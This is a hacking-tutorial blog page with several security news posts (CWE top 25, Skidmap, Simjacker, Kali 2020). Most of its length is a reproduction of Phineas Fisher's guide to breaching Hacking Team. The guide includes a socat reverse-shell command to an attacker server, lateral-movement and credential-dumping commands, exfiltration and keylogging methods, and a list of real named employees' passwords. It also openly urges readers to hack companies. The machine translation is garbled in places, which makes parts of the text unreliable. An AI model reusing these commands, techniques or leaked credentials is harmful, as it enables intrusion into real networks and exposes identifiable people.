Learn Penetration Testing And Ethical Hacking Online.


  • Facebook
  • Popular Posts

    Showing posts with label Hacking News. Show all posts
    Showing posts with label Hacking News. Show all posts
    top 25 most important software weaknesses

    There are many vulnerabilities that can affect security in our day to day. Many failures that make the software we use, network connections or the devices we use can be a threat. In this article we echo a list published by MITER that shows the 25 main software weaknesses that are the cause of the serious vulnerabilities that can affect our security. Let's talk about it.

    25 most important software weaknesses

    There are many errors that can affect the programs we use, the tools that our devices have. It is something that is present in our day to day. However, there are times when these vulnerabilities may represent a more important threat.

    MITER , an American company dedicated to systems engineering, research and development, has released a list of the 25 most important software vulnerabilities. They indicate that these errors can be easily exploited and, ultimately, be used by a possible attacker to have control of a system.

    Due to these vulnerabilities that are considered important, an attacker could steal confidential data, make the proper functioning of certain software impossible, or cause various attacks.

    The main objective of MITRE in making this list public is that software developers have it as a guide to control these vulnerabilities . This way they can create more secure software that does not put the security of users at risk, or at least reduce it as much as possible.

    Keep in mind that these 25 vulnerabilities are not the result of chance or what they believe. To reach this conclusion they have applied a formula that uses different scores to give a final assessment to each one. In this way they can draw up the definitive list with which they can have a higher level of prevalence and also represent a greater danger.

    To create this list have been based on vulnerabilities around the world. They have given a denomination to each of them and together with each one they have put the valuation, the CVSS score, which is what allows to know which are the most dangerous and, in short, with which the developers have to be more careful.

    Main vulnerabilities according to MITER

    If we start with the top 5 we can say that the most important vulnerability for MITRE and the one with the highest CVSS score is the incorrect restriction of operations within the limits of a memory buffer . He has been assigned the name of CWE-119 and has a score of 75.56.

    The second is the inappropriate neutralization of the input during the generation of the website . It has a rating of 45.69 and has been referred to as CWE-79.

    The following are, respectively, the incorrect input validation , which has qualified it with a score of 43.61 and has called it CWE-20; the exposure of information , called CWE-200 and a score of 32.12 and, closing the top 5, the vulnerability CWE-125 called reading out of bounds and with a score of 26.53.

    • These are the five main vulnerabilities according to MITER. However, in total they have released a list with 25. The remaining 20 are the ones mentioned below:
    • CWE-89 Incorrect neutralization of special elements used in an SQL command ("SQL Injection") 24,54
    • CWE-416 Use after free version 17.94
    • CWE-190 Entire Overflow 17,35
    • CWE-352 cross-site request forgery 15.54
    • CWE-22 Incorrect limitation of a path name to a restricted directory 14.10
    • CWE-78 Incorrect neutralization of special elements used in an operating system command 11,47
    • CWE-787 Writing out of bounds 11.08
    • CWE-287 Incorrect authentication 10.78
    • CWE-476 No cursor reference 9.74
    • CWE-732 Incorrect permission assignment for critical resource 6.33
    • CWE-434 Unrestricted upload of files of dangerous type 5.50
    • CWE-611 Incorrect XML restriction External entity reference 5.48
    • CWE-94 Improper control of code generation ("Code injection") 5.36
    • CWE-798 Use of coded credentials 5.12
    • CWE-400 Consumption of uncontrolled resources 5.04
    • CWE-772 Resource release is lacking after life 5.04
    • CWE-426 Unreliable search path 4.40
    • CWE-502 Deserialization of unreliable data 4.30
    • CWE-269 Inadequate privilege management 4.23
    • CWE-295 Incorrect validation of certificate 4.06
    Continue Reading
     new Linux malware Mines cryptography remains undetectable

    Two analysts threats recently hit a new Linux malware that conceals its cryptocurrency mining operations.

    On 16 September, Augusto Remillano II and Jakub Urbanec revealed in a news post on Trend Micro, a security intelligence blog, they have discovered a new malware. According to analysts, this malware is particularly notable for the way it loads malicious kernel modules to mask its mining operations of crypto-time data.

    Malware provides full access hackers to the infected machine

    Analysts have found that Skidmap hid his cryptocurrency extraction using a rootkit, a program that installs and executes code on a system without the consent or knowledge of the end user. This makes its malicious components undetectable by infected system monitoring tools.

    In addition to launching a crypto-piracy campaign on the infected machine, the malware would give attackers a "unfettered access" to the affected system. Analysts add:

    "Skidmap aussi olefins has a backdoor way to get access to the engine and replaces the file system aussi pam_unix.so by His Own malicious release. This malicious file Accepts a specific password for all users, Allowing attackers to log in As Any use of the machine. " 

    cryptojacking campaigns up 29%

    Cryptojacking is a term used in the industry to designate crypto-exploration stealth attacks which consist of malicious software or any other way to computer processing power to operate without the consent or cryptomoney the knowledge of the owner.

    In August, the McAfee Labs cybersecurity company released a report on threats in the first quarter of 2019. According to the report, the cryptojacking would have increased, with an increase of 29% cryptojacking campaigns.
    Continue Reading
    Vulnerability of Simjacker allows hackers to hack into any phone simply by sending SMS

    Vulnerability in SIM-cards, how to protect against Simjacker

    The vulnerability of Simjacker can spread to more than 1 billion mobile phone users worldwide.

    A new and previously unrecognized critical vulnerability has been discovered in SIM cards, which could allow remote attackers to compromise targeted mobile phones and spy on victims simply by sending an SMS message.

    This vulnerability, dubbed “SimJacker,” is located in certain software called S @ T Browser (a dynamic toolkit for SIM cards) embedded in most SIM cards that is widely used by mobile operators in at least 30 countries and can be used no matter what phones the victims use.

    Well, what's wrong with that? A special private company that works with governments has been actively exploiting the SimJacker vulnerability for at least the past two years to conduct targeted monitoring of mobile phone users in several countries.

    S @ T Browser, short for SIMalliance Toolbox Browser, is an application that installs on various SIM cards, including eSIM, as part of the SIM Tool Kit (STK) and is designed to enable mobile operators to provide some basic services, subscriptions, and additional wireless services for its customers.

    Because the S @ T Browser contains a number of STK instructions — such as sending a short message, setting up a call, launching a browser, providing local data, launching on command, and sending data — that can be caused by simply sending an SMS message to the device, the software offers a runtime environment to run malicious commands on mobile phones.

    How does the Simjacker Vulnerability work?

    Discovered by researchers from AdaptiveMobile Security in a new study published on September 12, 1919, the vulnerability can be exploited using a GSM modem for $ 10 to perform several tasks listed below on a target device by simply sending an SMS message containing a certain type of spy code .
    • Retrieving the location of the target device and IMEI information,
    • Spreading false information by sending fake messages on behalf of the victims,
    • Performing premium rate fraud by dialing premium rate numbers,
    • Spy on the surroundings of victims by ordering the device to call the attacker’s phone number,
    • The spread of malware, forcing the victim’s phone browser to open a malicious web page,
    • Perform denial of service attacks by disconnecting the SIM card and
    • Getting other information, such as language, type of radio, battery level, etc.
    During the attack, the user is completely unaware that he received the attack, that the information was extracted and that it was successfully deleted,” the researchers explain.

    This attack is also unique in that the Simjacker attack message can be logically classified as carrying full malware load, especially spyware. This is because it contains a list of instructions that the SIM card must follow. Simjacker is the first real attack in which spyware is sent directly to SMS.

    Although technical details, a detailed document and proof of concept of the vulnerability are planned to be published in October this year, the researchers said they observed real attacks on users with devices from almost all manufacturers, including Apple, ZTE, Motorola, Samsung, Google, Huawei and even IoT with SIM cards.

    It turns out that all manufacturers and models of mobile phones are vulnerable to SimJacker attacks, since this vulnerability uses outdated technology built into SIM cards, the specification of which has not been updated since 2009, which potentially puts more than a billion people at risk.
    Simjacker Wildlife Vulnerability

    Researchers say that the Simjacker attack worked very well and has been used successfully for many years, "because it used a combination of sophisticated interfaces and obscure technologies, showing that mobile operators cannot rely on standard installed security features."

    Simjacker is a clear danger to mobile operators and subscribers. This is potentially the most sophisticated attack that has ever existed on major mobile networks. ”
    said Ketal MacDade, CTO at AdaptiveMobile Security, in a press release.

    “This is the main alarm signal that shows that hostile actors are investing heavily in increasingly sophisticated and creative ways to undermine network security.” This threatens the security and trust of customers, mobile operators and affects the national security of entire countries. "

    Moreover, now that this vulnerability has been publicly disclosed, researchers expect hackers and other attackers to "develop these attacks in other areas."

    Researchers have responsibly revealed the details of this vulnerability of the GSM Association, a trading organization representing the community of mobile operators, as well as the SIM alliance, representing the major manufacturers of SIM cards / UICC.

    SIMalliance acknowledged the issue and provided recommendations for security SIM card manufacturers for S @ T push messages.

    Mobile operators can also immediately eliminate this threat by setting up the process of analyzing and blocking suspicious messages containing S @ T browser commands.

    We, as a potential victim, as a user of a mobile device, can do nothing if we use a SIM card with S @ T Browser technology deployed on it, except for a request to replace our SIM card on which patented security mechanisms are installed.

    More information about Simjacker can be found at www.simjacker.com, and Katal MacDade, CTO of AdaptiveMobile Security, will introduce Simjacker at the Virus Bulletin Conference, London, October 3, 2019.
    Continue Reading
    Kali Linux 2020: news and download of this distribution of ethical hacking

    When we talk about Kali Linux, we mean one of the most important and best known ethical hacking suits worldwide. It offers a wide range of possibilities to users and that makes each new version make many are attentive to their news. In this article we echo thenews of Kali Linux 2020, as well as explain how we can download this Linux distribution.

    As often happens with each new update, whatever the type of program or system, they bring improvements. These improvements translate into new functions or tools that make the day-to-day life of users benefit. But you also have to keep in mind that with each new version, present problems are corrected.

    Kali Linux allows users to perform different ethical hacking tests. Now they have a series of novelties that make this Linux distribution even more attractive. We are facing the third update of this current version. We will comment on the most important changes.

    What's new in Kali Linux 2020

    One of the novelties of Kali Linux 2020 that we can mention is that they have started usingCloudflare CDN to host the repository and distribute content to users. This they do to improve the quality and speed of downloads.

    There are also changes regardingmetapackages. Now there is an additional and unique image called kali-linux-large-2020-amd64.iso.

    Kali Linux 2020 is not a great update that brings very significant changes, however ithas improved certain applications. For example we talk about tools like Burp Suite, HostAPd-WPE, Hyperion, Kismet andNmap. All of them have been updated to a new version and have included improvements.

    One of the significant changes in relation to applications is that it now includesAmass. It is a tool that security professionals can use to map the network and discover possible external threats. Now this tool comes standard with Kali Linux.

    For the rest, it should also be mentioned that improvements have been made in terms of failures and security errors. Corrections that, in short, make this new version safer.

    How to get Kali Linux 2020

    It should be mentioned that for those users who already have this distribution installed and have it updated they will not have much to do. They would simply have to run the root @ kali command: ~ # apt update && apt-and full-upgrade to make sure they have the most current version.
    For those users who do not have it installed or want to obtain the ISO for some reason, it is best to go to the official website . There you just have to go to the download section and download the version you want (64 bits, 32 bits ...).

    As we always say, it is important to download software from official and reliable sites. We must avoid doing it from third-party links that we don't really know who it belongs to and what could be behind it.

    In addition, having updated systems can bring important benefits. On the one hand we will have the most updated tools and thus obtain improvements in performance. However, security is also very important. Security vulnerabilities are corrected with each new update . Faults that can be exploited by cyber criminals and that have been patched.
    Continue Reading
    Phineas Fisher explains how he hacked Hacking Team

    Hacking Team's leak was worldwide news, but nobody knew much about the author or how he did it. That mystery has finally been revealed. After eight months of almost complete silence, Phineas Fisher, the pseudonym behind the person who carried out the attack, has published a guide in Spanish DIY (Do It Yourself) with a detailed explanation of the tools and how he broke the security of the company's systems and uncovered its best kept secrets, as some of its clients in Spain: the CNI, the Civil Guard and the Police.

    Hacking Team was a company that helped governments to hack and spy on journalists, activists, political opponents, and other threats to their power And, very occasionally, to criminals and terrorists A Vincenzetti, the CEO, liked to finish his emails with the fascist slogan "boia chi molla". It would be more successful "boia chi sells RCS". They also claimed to have technology to solve the "problem" of Tor and the darknet

    Phineas Fisher snuck into the hacking team network silently and leaked more than 400 gigabytes of data, but it also serves as a manifesto of his political ideals and the motives behind access. 

    Before someone had to sneak into the offices to filter documents. A gun was needed to rob a bank. Today you can do it from the bed with a laptop in your hands As the CNT said after the hacking of the Gamma Group: "we will try to take a step forward with new forms of struggle". Hacking is a powerful tool, let's learn and fight! 

    At the end of the guide the author comments:

    And that's all it takes to end a business and end its human rights abuses
    With only 100 hours of work, a person can undo years of work from a multi-million dollar company. 

    In the guide, Phineas Fisher encourages others to follow his example

    Phineas Fisher argued that leaking documents to demonstrate corruption and abuse of power is really " ethical hacking ," instead of doing consulting work for companies that are often the ones that really deserve to be hacked. 

    Hacking Team is an Italian company that sells spyware and hacking services to police and intelligence services around the world. Over the years, researchers have documented several cases in which Hacking Team tools were used against journalists, dissidents, or activists. 

    On the night that the hacker published the data, he revealed himself to be the same person who in 2014 also hacked Gamma International, a competitor of a hacker team that sells spyware called FinFisher. 

     For months, however, a big question has gone unanswered: how the hacker managed to baffle and completely own a company whose business model depended exactly on hacking other people? 

    At that moment, the hacker promised that he would soon tell the world. I just wanted to wait a little while, he said on Twitter, until the Hacking team "had a little time to fail to figure out what happened and get out of business." 

    In his guide, published on Friday, the hacker explained how an unknown vulnerability is used ,or day zero (0day), to obtain the first point of support in the internal network of Hacking Team. Keeping in mind that the bug has not yet been patched, however, Phineas Fisher did not provide any details about what the vulnerability is exactly, or where it found it. 

    After entering, the hacker said he moved around carefully, first downloading emails, then accessing other servers and parts of the network. Having administrative privileges obtained within the company's main Windows network, Phineas Fisher said that spying on system administrators, especially Cristiana Pozzi, given that they generally have access to the entire network. After having stolen Pozzi's passwordsthe record of his keystrokes , the hacker said he accessed and exfiltrated all the source code of the company, which is housed in a separate isolated network. 

    At that point, the hacking Team Twitter password is reset with the "Forgot your password" function, and on July 5, it announced the hack using the company's own Twitter account.

    The hacker said that he was inside the Hacking Team network for six weeks, and that it took him about 100 hours of work to get around and get all the data. Judging by his words, it is clear Phineas Fisher had a strong political motivation for the Hacking Team's computer attack.

    I want to dedicate this guide for the victims of the assault to the school Armando DĂ­az, and all those who had the blood shed by the Italian fascists

    In reference to the bloody raid on the Italian school in Genoa in 2001, where police forces broke into a school where they lodged against the G-8 Genao Social Forum activists, resulting in the arrest of 93 activists. The methods of the raid and subsequent arrest, however, were so controversial that 125 policemen were brought to trial, accused of beating and torturing the detainees. 

    The hacker also rejected being defined as a vigilante, and opted for a more political definition.

    "I characterize myself as an anarchist revolutionary, not as a vigilante," he said in an email. "The vigilantes act outside the system, but intend to carry out the work of the judicial system, the police and none of which I am a fan of, I am clearly a criminal, it is not clear if hacking equipment has done anything illegal. If someone, the piracy of the team are the vigilantes, who acts on the margins in search of their love for authority and law and order. "

    Hacking allows the weakest gives the opportunity to fight and win

    Hacking is a powerful tool. Let's learn and fight!

    He wrote, citing the anarcho-syndicalist union National Labor Commission, or CNT. After Phineas Fisher hacked Grupo Gamma in 2014, the CNT said that clear technology was just another front in the class struggle, and that it was time to "take a step forward" with "new forms of struggle." 

    It is impossible to verify if all the details in the guide are true, since none of the hacking teams or the Italian authorities have made known everything related to the hack.

    "Any comments should come from the Italian law enforcement authorities who have been investigating the attack on the computer piracy, so there is no comment from the company," Hacking Team spokesman Eric Rabe said in an email. The Italian prosecutor's office could not be reached for comment. 

    It is not clear how the investigation is going, but Phineas Fisher does not seem too concerned about whether he will be caughtIn another section of his guide, he described Hacking Team as a company that helped governments spy on activists, journalists, political opponents, and "very occasionally" criminals and terrorists. The hacker also referred to the piracy claims of the team that was developing technology to track criminals using the Tor network and on the dark web. 

    "But considering that I'm still free," Snarkily wrote, "I have doubts about its effectiveness."


    It often comes out in the news that they have attributed an attack to a group of government hackers (the " APT s"), because they always use the same tools, leave the same footprints, and even use the same infrastructure (domains, emails etc). They are negligent because they can hack without legal consequences. 

    I did not want to make the work of the police easier and relate the Hacking Team with the hacks and nicknames of my daily work as a black glove hacker. So I used new servers and domains, registered with new emails and paid with new bitcoin addresses. In addition, I only used public tools and things that I wrote especially for this attack and changed my way of doing some things so as not to leave my normal forensic footprint.

    After the Gamma Group hack, I described a process to look for vulnerabilities. 

     Hacking Team has a public IP range: 
    inetnum: - 
    descr: HT public subnet

    Hacking Team had very little exposed on the internet. For example, unlike Gamma Group, your customer service site needs a customer's certificate to connect. What he had was his main website (a Joomla blog where Joomscan does not reveal any serious flaws), a mail server, a couple of routers, two VPN devices, and a device to filter spam. Then I had three options:

    1. look for a 0day in Joomla, 
    2. look for a 0day in postfix, or
    3.  look for a 0day in one of the embedded systems. A 0day in an embedded system seemed to me the most achievable option, and after two weeks of reverse engineering work, I achieved a remote root exploit. Since the vulnerabilities have not yet been patched, I will not give more details. 

    There is a lot of work and testing before using the exploit against Hacking Team. 

    Wrote a firmware with backdoor, and compiled several post-exploitation tools for the embedded system. The backdoor serves to protect the exploit. Using the exploit only once and then returning through the backdoor makes it more difficult to discover and patch the vulnerabilities.

    Tools used in the attack to Hacking Team

    The post-exploitation tools I had prepared were:

    • 1) busybox For all common UNIX utilities that the system does not have
    • 2) nmap To scan and fingerprint the internal Hacking Team network.
    • 3) Responder.py The most useful tool to attack Windows networks when you have access to the internal network but do not have a domain user.
    • 4) Python To run Responder.py
    • 5) tcpdump To sniff traffic.
    • 6) dsniff To spy passwords of weak protocols like ftp, and to do
    • arpspoofing. I wanted to use ettercap, written by the same ALoR and NaGA from Hacking Team, but it was difficult to compile it for the system.
    • 7) socat For a comfortable shell with pty: my_server: socat file: `tty`, raw, echo = 0 tcp-listen: my_port system hacked: socat exec: 'bash -li', pty, stderr, setsid, sigint, sane \ tcp: my_server: my_port And for many more things, it's a Swiss army knife. See the examples section of your documentation.
    • 8) screen As the pty of socat, it is not strictly necessary, but I wanted to feel at home in the Hacking Team networks.
    • 9) a SOCKS proxy server To use together with proxychains to access the internal network with any other program.
    • 10) tgcd To forward ports, like the SOCKS server, through the firewall.

    The worst that could happen was that my backdoor or post-exploitation tools left the system unstable and had an employee investigate it. Therefore, I spent a week testing my exploit, backdoor, and post-exploitation tools on the networks of other vulnerable companies before entering the Hacking Team network.

    NoSQL database

    NoSQL, or rather NoAutentication, has been a great gift to the hacker community. When I worry that they finally patched all the failures of omitting authentication in MySQL [2] [3] [4] [5], new databases become fashionable without authentication by design. Nmap finds a few on the 
    internal network of Hacking Team:

    27017 / tcp open mongodb MongoDB 2.6.5 
    ok = 1 
    totalSizeMb = 47547 
    totalSize = 49856643072 
    | _ version = 2.6.5 

    27017 / tcp open mongodb MongoDB 2.6.5 
    ok = 1 
    totalSizeMb = 31987 
    totalSize = 33540800512 
    | _ version = 2.6.5

    Were the databases for RCS test instances. The audio recorded by RCS is saved in MongoDB with GridFS. The audio folder in the torrent [6] comes from this. They spied on themselves unintentionally. 

    Although it was fun to listen to recordings and see webcam images of Hacking Team developing their malware, it was not very useful. Their insecure backups were the vulnerability that opened their doors . According to its documentation [1], its iSCSI devices must be in a separate network, but nmap finds ones in its subnet 

    Nmap scan report for ht-synology.hackingteam.local ( 
    3260 / tcp open iscsi? 
    Target: iqn.2000-01.com.synology: ht-synology.name 
    | _ Authentication: No authentication required 

    Nmap scan report for synology-backup.hackingteam.local ( 
    3260 / tcp open iscsi? 
    Target: iqn.2000-01.com.synology: synology-backup.name 
    | _ Authentication: No authentication required

    and we found backup copies of several virtual machines. The Exchange server seems the most interesting. It's too big to download, but we can mount it remotely and look for interesting files:

    $ losetup / dev / loop0 Exchange.hackingteam.com-flat.vmdk 
    $ fdisk -l / dev / loop0 
    / dev / loop0p1 2048 1258287103 629142528 7 HPFS / NTFS / exFAT

    then the offset is 2048 * 512 = 1048576

    $ losetup -o 1048576 / dev / loop1 / dev / loop0 
    $ mount -o ro / dev / loop1 / mnt / exchange /

    now in / mnt / exchange / WindowsImageBackup / EXCHANGE / Backup 2014-10-14 172311 
    we find the hard disk of the virtual machine, and assemble it:

    vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd / mnt / vhd-disk / 
    mount -o loop / mnt / vhd-disk / Partition1 / mnt / part1

    ... and finally we have unpacked the Russian doll and we can see all the files of the old Exchange server in / mnt / part1

     What were the passwords of the Hacking Team administrators?

    What interests me most about the backup is to find out if you have a password or hash that you can use to access the current server. Use pwdump, cachedump, and lsadump [1] with the registry files. lsadump finds the password for the besadmin service account:

    _SC_BlackBerry MDS Connection Service 
    0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
    0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 bes3. 
    0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00!.!.! ...........

    I use proxychains [2] with the server socks in the embedded system and smbclient [3] to check the password:

    proxychins smbclient '//$' -U 'hackingteam.local / besadmin% bes32678 !!!'

    !Works! The besadmin password is still valid, and it is a local administrator. I use my proxy and psexec_psh from metasploit [4] to get a meterpreter session. Then I migrate to a 64-bit process, "load kiwi" [5], "creds_wdigest", and I already have many passwords, including the domain administrator's 

    password Hacking Team employees' passwords were:

    HACKINGTEAM BESAdmin bes32678 !!! 
    HACKINGTEAM Administrator uu8dd8ndd12! 
    HACKINGTEAM c.pozzi P4ssword 
    HACKINGTEAM m.romeo ioLK / (90 
    HACKINGTEAM l. War 4luc@=.= 
    HACKINGTEAM d.martinez W4tudul3sp 
    HACKINGTEAM g.russo GCBr0s0705! 
    HACKINGTEAM a.scarafile Cd4432996111 
    HACKINGTEAM r.viscardi Ht2015! 
    HACKINGTEAM a.mino A! e $$ andra 
    HACKINGTEAM m.bettini Ettore & Bella0314 
    HACKINGTEAM m.luppi Blackou7 
    HACKINGTEAM s.gallucci 1S9i8m4o! 
    HACKINGTEAM d.milan set! dob66 
    HACKINGTEAM w.furlan Blu3.B3rry! 
    HACKINGTEAM d.romualdi Rd13136f @ # 
    HACKINGTEAM l.invernizzi L0r3nz0123! 
    HACKINGTEAM e .ciceri 2O2571 & 2E
    HACKINGTEAM e.rabe erab @ 4HT!
    Powerful attention to Cristina Pozzi's password: P

    Introduction to Windows Domain Hacking

    I will give a brief review of the techniques to spread within a Windows network. The techniques to run remotely require the password or hash of a local administrator on the target. By far the most common way to get these credentials is to use mimikatz [1], especially sekurlsa :: logonpasswords and sekurlsa :: msv, on computers where you already have administrative access. Movement techniques "in situ" also require administrative privileges (except for runes). The most important tools for privilege escalation are PowerUp [2], and bypassuac [3]. 

    Remote Motion: 

    1) psexec

    The basic and proven way of movement in windows networks. You can use psexec [1], winexe [2], psexec_psh from metasploit [3], invoke_psexec from powershell empire [4], or the windows command "sc" [5]. For the module metasploit, powershell empire, and pth-winexe [6], just know the hash without knowing the password. It is the most universal way (it works on any computer with open port 445), but also the least cautious way. The type 7045 "Service Control Manager" will appear in the event log. In my experience, they have never noticed it during a hack, but sometimes they notice it later and it helps researchers understand what the hacker has done. 

    2) WMI

    The most cautious way. The WMI service is enabled on all windows computers, but except for servers, the firewall blocks it by default. You can use wmiexec.py [7], pth-wmis [6] (here they have a demonstration of wmiexec and pth-wmis [8]), invoke_wmi of powershell empire [9], or the command of windows wmic [5]. All except wmic only need the hash. 

    3) PSRemoting [10] 

    It is disabled by default, and I do not advise you to enable new protocols that are not necessary. But if the sysadmin has already enabled it, it is very convenient, especially if you use powershell for everything (and yes,
    you should use powershell for almost everything, it's going to change [11] with powershell 5 and windows 10, but nowadays powershell makes it easy to do everything in RAM, dodge antivirus, and leave few traces). 

    4) Scheduled tasks 

    Remote programs can be executed with at and schtasks [5]. It works in the same situations as psexec, and also leaves known traces [12]. 

    5) GPO

    If all these protocols are disabled or blocked by the firewall, once you are the administrator of the domain, you can use GPO to give a logon script, install a msi, execute a scheduled task [13], or as we will see with the Mauro Romeo's computer (sysadmin of Hacking 
    Team), enable WMI and open the firewall through GPO. 

    Movement "in situ":

    1) Impersonalizing Tokens 

    Once you have administrative access to a computer, you can use the tokens of other users to access resources in the domain. Two tools to do this are incognito [1] and the token :: * commands of mimikatz [2]. 

    2) MS14-068 

    A validation failure in kerberos can be used to generate a domain administrator ticket [3] [4] [5]. 

    3) Pass the Hash 

    If you have your hash but the user does not have a session started, you can use sekurlsa :: pth [2] to get a ticket from the user. 

    4) Process Injection

    Any RAT can be injected into another process, for example the command migrate in meterpreter and pupy [6] or psinject [7] in powershell empire. You can inject to the process that has the token that you want. 

    5) runes 

    This is sometimes very useful because it does not require administrator privileges. The command is part of windows, but if you do not have a graphical interface you can use powershell [8].

    Persistence: maintain access

    Once you have access, you want to keep it. Actually, persistence is just a challenge for bastards like those of Hacking Team who want to hack activists or other individuals. To hack companies, you do not need persistence because companies never sleep. I always use "persistence" like duqu 2, run in RAM on a pair of servers with high percentages of uptime. In the hypothetical case that everyone restarts at the same time, I have passwords and a gold ticket [1] for reserve access. You can read more information about the persistence mechanisms for windows here [2] [3] [4]. But to hack companies, it is not necessary and the risk of detection increases.

    The best tool today to understand Windows networks is Powerview [1]. It is worth reading everything written by the author [2], first of all [3], [4], [5], and [6]. Powershell itself is also very powerful [7]. As there are still many servers 2003 and 2000 without powershell, you also have to learn the old school [8], with tools like netview.exe [9] or the windows command "net view". Other techniques that I like are: 

    1) Download a list of file names 

    With a domain administrator account, you can download all file names in the network with powerview:

    Invoke-ShareFinderThreaded -ExcludedShares IPC $, PRINT $, ADMIN $ | 
    select-string '^ (. *) \ t-' | % {dir -recurse $ _. Matches [0] .Groups [1] | 
    select fullname | out-file -append files.txt}

    Later, you can read it at your own pace and choose which ones you want to download. 

    2) Read emails 

    As we have seen, you can download emails with powershell, and they have a lot of useful information. 

    3) Read sharepoint 

    It is another place where many companies have important information. It can be downloaded with powershell [10]. 

    4) Active Directory [11] 

    It has a lot of useful information about users and computers. Without being a domain administrator, you can already find a lot of information with powerview and other tools [12]. After getting domain administrator you should export all AD information with csvde or another tool. 

    5) Spy on employees

    One of my favorite hobbies is hunting the sysadmins. Spying on Christan Pozzi (sysadmin of Hacking Team) I got access to the Nagios server that gave me access to the rete sviluppo (development network with the RCS source code). With a simple combination of Get-Keystrokes and Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang [14], and GPO, you can spy on any employee or even the entire domain.

    When I read the documentation of their infrastructure [1], I realized that I still lacked access to something important - the "Rete Sviluppo", an isolated network that stores all the source code of RCS. The sysadmins of a company always have access to everything. I searched the computers of Mauro Romeo and Christian Pozzi to see how they manage the sviluppo network, and to see if there were other interesting systems that I should investigate. It was easy to access their computers since they were part of the Windows domain in which they had administrator. Mauro Romeo's computer had no open port, so I opened the WMI port [2] to run meterpreter [3]. In addition to recording keys and captures with Get-Keystrokes and Get-TimedScreenshot, I used many modules / gather / of metasploit, CredMan.ps1 [4], and searched for files [5]. When I saw that Pozzi had a Truecrypt volume, I waited until I had mounted it to copy the files then. Many have laughed at the weak passwords of Christian Pozzi (and Christian Pozzi in general, offers enough material for comedy [6] [7] [8] [9]). I included them in the filtration as an oversight and to laugh at him. The reality is that mimikatz and keyloggers see all the same passwords.

    Within the encrypted volume of Christian Pozzi, there was a textfile with many passwords [1]. One of them was for a Fully Automated Nagios server, which had access to the sviluppo network to monitor it. I had found the bridge. I only had the password for the web interface, but there was a public exploit [2] to execute code and get a shell (it is an exploit not authenticated, but it is necessary for a user to have logged in for which I used the textfile password).

    Reading the emails, I had seen Daniele Milan granting access to git repositories. I already had your windows password thanks to mimikatz. I tried it with the git server and it worked. I tried sudo and it worked. For the gitlab server and its twitter account, I used the function "forgot my password", and my access to the mail server to reset the password.

    Hacking guides usually end with a warning: this information is for educational purposes only, be an ethical hacker, not attack computers without permission, blablablá. I will say the same, but with a more rebellious concept of "ethical" hacking. It would be ethical hacking to filter documents, expropriate money to banks, and protect the computers of ordinary people. However, most people who call themselves "ethical hackers" work only to protect those who pay their consulting fee, which are often the ones that deserve the most hacking.

    In Hacking Team they see themselves as part of a tradition of inspiring Italian design [1]. I see Vincenzetti, his company, and his cronies from the police, police, and government, as part of a long tradition of Italian fascism. I want to dedicate this guide to the victims of the assault on the Armando Diaz school, and to all those who have shed their blood at the hands of Italian fascists. 
    Continue Reading